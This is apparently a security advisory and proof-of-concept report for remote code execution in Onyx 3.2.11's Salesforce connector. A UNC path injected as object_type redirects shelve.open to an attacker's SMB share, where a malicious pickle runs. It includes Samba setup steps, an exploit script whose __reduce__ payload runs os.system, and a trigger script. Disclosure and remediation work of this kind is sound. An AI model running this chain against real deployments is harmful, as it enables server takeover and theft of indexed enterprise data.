Onyx - Version 3.2.11 / Remote Code Execution (RCE) via Insecure Deserialization based on Absolute Path Injection (UNC) in shelve.open
Below are one (1) way to reproduce RCE in Onyx using an SMB share controlled by an attacker, without local intervention by a third party to modify files that allow code execution during the deserialization process.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 3.2.11, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
Onyx (previously known as Danswer) is a popular open-source enterprise search and AI assistant platform. It connects with corporate data tools like Salesforce, Slack, Google Drive, and Confluence, allowing organizations to search across all internal knowledge bases using natural language queries. By indexing internal documents and integrating with Large Language Models (LLMs), it acts as a private, secure ChatGPT for company data.
The platform's importance lies in its role as a central search hub for critical, high-trust business data. To prevent performance bottlenecks, Onyx utilizes connectors that cache synchronized database objects using Python's native shelve module. When components like the Salesforce connector dynamically resolve cache locations based on attributes like object_type, any path sanitization failure can break the security confinement of corporate environments, opening severe unauthenticated remote serialization exploit vectors.
Vulnerability Description
The vulnerability stems from the unsafe use of os.path.join(BASE_DATA_PATH, object_type). In Python, if a component passed to os.path.join is an absolute path (or a Windows UNC path like \\attacker\share), all previous components are discarded.
An attacker supplying a Windows UNC path as the object_type forces the application to build the shelf database path on the attacker's remote SMB server, bypassing the local BASE_DATA_PATH.
The vulnerability exists because shelve_utils.py allows redirecting the path towards the attacker, and shelve_functions.py blindly executes whatever is found at that path. If either of these two files were programmed securely, this specific vulnerability would not exist.
The vulnerable code in shelve_utils.py:
def get_object_type_path(object_type: str) -> str:
"""Get the directory path for a specific object type."""
type_dir = os.path.join(BASE_DATA_PATH, object_type) # <-- VULNERABLE PATH JOIN (Allows UNC path override)
os.makedirs(type_dir, exist_ok=True)
return type_dir
The vulnerable code in shelve_functions.py:
def get_record(object_id: str, object_type: str | None = None) -> SalesforceObject | None:
...
shelf_path = get_object_shelf_path(object_type)
with shelve.open(shelf_path) as db: # <-- VULNERABLE SINK (Triggers pickle.loads() on value fetch)
if object_id not in db:
return None
data = db[object_id]
To understand why they depend on each other for the vulnerability to exist, one must look at how the execution is chained:
- The Injection Facilitator (Path Injection in
shelve_utils.py): The function takes theobject_typeargument and usesos.path.join. If it is a UNC path (e.g.\\192.168.1.90\lab_share), the function discards the local base directory, forcing the path to resolve to the attacker's server. - The Execution Detonator (Deserialization Sink in
shelve_functions.py): The program takes that remote path and passes it toshelve.open. Theshelvelibrary works underneath usingpickle. When the code extracts data viadb[object_id], it automatically executespickle.loads(), detonating Remote Code Execution (RCE).
Technical Impact Analysis
Project Purpose & Context
Onyx is a unified AI search and assistant engine connecting multiple enterprise data stores (Salesforce, Google Drive, etc.). The Salesforce connector utilizes a caching mechanism via shelf databases to speed up repetitive query executions and reduce external API load.
Platform & Deployment Environment
Typically deployed using Docker/Kubernetes inside enterprise networks. If the container or VM runs in an environment resolving Windows UNC paths natively (or using OS integrations), it is highly vulnerable to remote path coercion via standard SMB shares.
Comprehensive Risk Assessment
The vulnerability represents a Critical security risk. It allows an attacker to bypass directory confinement, force remote connections to an attacker-controlled share, and trigger unauthenticated code execution via pickle.loads() in the backend database cache resolver.
Attack Scenario
The attack targets the Salesforce database connection flow. An attacker hosts a malicious database file on their remote SMB share and feeds the UNC path parameter to the server via the object_type field. The server blindly loads the remote database file and deserializes the malicious object, giving the attacker reverse-shell access.
Who wants to exploit a particular vulnerability?
- Initial Access Brokers: To breach enterprise networks hosting internal instances of
Onyx. - Corporate Espionage Actors: To intercept indexed documents, Slack messages, or Salesforce records stored in the search platform.
For what gain?
Full system takeover of the AI search backend. This gives access to sensitive indexed enterprise data and authorization keys for other platforms (Slack, Slackbot tokens, Google Workspace OAuth keys, Salesforce databases).
In what way?
By exploiting the behavior of os.path.join on absolute UNC inputs to force shelve.open into opening remote databases containing serialized exploits.
Reproduction steps
On the Raspberry (attacker) - IP 192.168.1.90
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
Shared Resource Configuration (SMB):
1. Install Samba: sudo apt update && sudo apt install samba samba-common-bin -y.
2. Prepare the attack directory:
mkdir ~/lab_attack
chmod 755 /home/kw0
chmod -R 777 ~/lab_attack
3. Configure Samba: Add to the end of /etc/samba/smb.conf:
[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes
Payload Generation on the Raspberry: Run the specialized exploit.py script to generate the shelf database files directly in the shared path:
import shelve
import os
import dbm.dumb
payload_dir = "/home/kw0/lab_attack/"
os.makedirs(payload_dir, exist_ok=True)
db_path = os.path.join(payload_dir, 'data.shelf')
class Exploit:
def __reduce__(self):
# Best Practice: Use 'or {}' so the result of the expression
# is a dictionary, preventing crashes in the victim app.
return (eval, ("__import__('os').system('calc.exe') or {}",))
# Usamos explicitamente dbm.dumb para asegurar que se crean los archivos:
# data.shelf.dat, data.shelf.dir y data.shelf.bak (Compatibilidad con Windows)
with dbm.dumb.open(db_path, 'c') as db:
with shelve.Shelf(db) as shelf:
shelf['malicious_key'] = Exploit()
print(f"[*] Malicious shelf database generated successfully at: {db_path}")
print("[*] Verify that .dat, .dir, and .bak files exist in the directory.")
python exploit.py
On Windows (victim) - IP 192.168.1.88
(.venv) PS L:\Deserializer\onyx> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
1. Create a .venv, activate it, and install the latest updated version (3.2.11) of Onyx by cloning the repository and using uv sync.
2. Enable the SMB share: net use Z: \\192.168.1.90\lab_share /persistent:no.
3. Run the specialized poc.py script to trigger the vulnerability:
from onyx.connectors.salesforce.shelve_stuff.shelve_functions import get_record
# 1. Define the UNC path pointing to the attacker's SMB share.
# The application will append '\data.shelf' to this path.
# So if object_type is '\\192.168.1.100\share', the app looks for '\\192.168.1.100\share\data.shelf'
attacker_unc_path = r"\\192.168.1.90\lab_share"
# 2. Define the object_id that matches the key we inserted into the malicious shelf
target_object_id = "malicious_key"
print(f"[*] Triggering get_record with UNC path: {attacker_unc_path}")
# 3. Call the vulnerable function
# This will execute: shelve.open(r'\\192.168.1.100\share\data.shelf')
# and then access db['malicious_key'], triggering pickle.loads() and executing calc.exe
try:
record = get_record(object_id=target_object_id, object_type=attacker_unc_path)
except Exception as e:
# Expected to raise an exception or hang briefly while executing the payload
pass
print("[*] Exploit execution finished.")
python poc.py
Executive Summary: RCE via UNC Path Injection and Insecure Deserialization in Onyx
The research identifies a critical Remote Code Execution (RCE) vulnerability in the Salesforce connector component of Onyx v3.2.11.
- Root Cause: The system uses
os.path.jointo construct file paths forshelvedatabases. Becauseos.path.joindiscards preceding path components when an absolute or UNC path is provided as the second argument, an attacker can override the intendedBASE_DATA_PATH. - Exploitation Mechanism: By supplying a malicious Windows UNC path (e.g.,
\\192.168.1.90\lab_share) as theobject_type, the attacker forces the application to open a database hosted on a remote SMB share. Asshelveutilizespickleinternally, accessing any key within this remote database triggerspickle.loads(), leading to immediate code execution.
Analysis of Scope and Security Implications
This vulnerability is of critical severity as it weaponizes legitimate Salesforce data synchronization logic to bypass file system isolation.
1. Infection Scenarios
- Enterprise Pivot:
Onyxis an AI-powered enterprise search platform. An attacker exploiting this RCE can gain full control over the backend server, enabling lateral movement into connected enterprise data stores like Slack, Google Workspace, and Salesforce. - UNC Redirection: In Windows-based deployment environments, the application’s reliance on native OS path resolution allows attackers to bypass local security controls, effectively turning any reachable SMB share into an RCE payload delivery system.
2. Factors Exacerbating Risk
- Chained Vulnerabilities: The impact relies on the combination of path hijacking (facilitated by
shelve_utils.py) and the dangerous deserialization sink (found inshelve_functions.py). The chain is seamless, requiring zero interaction from the victim once the payload is placed on the remote share. - High-Value Data Access: Since the platform is designed to index and query sensitive enterprise data, successful RCE provides an attacker with a direct path to steal PII, internal API keys, and proprietary knowledge assets indexed by the platform.
Conclusion and Recommendation
This is a critical-severity vulnerability. The reliance on shelve (which wraps pickle) combined with insecure path construction creates a trivial and potent RCE vector.
Suggested actions for the development team:
- Replace Shelve/Pickle: Immediately deprecate the use of
shelvefor database management. Replace it with a secure, non-executable data serialization format such asJSONor Protobuf paired with standard database d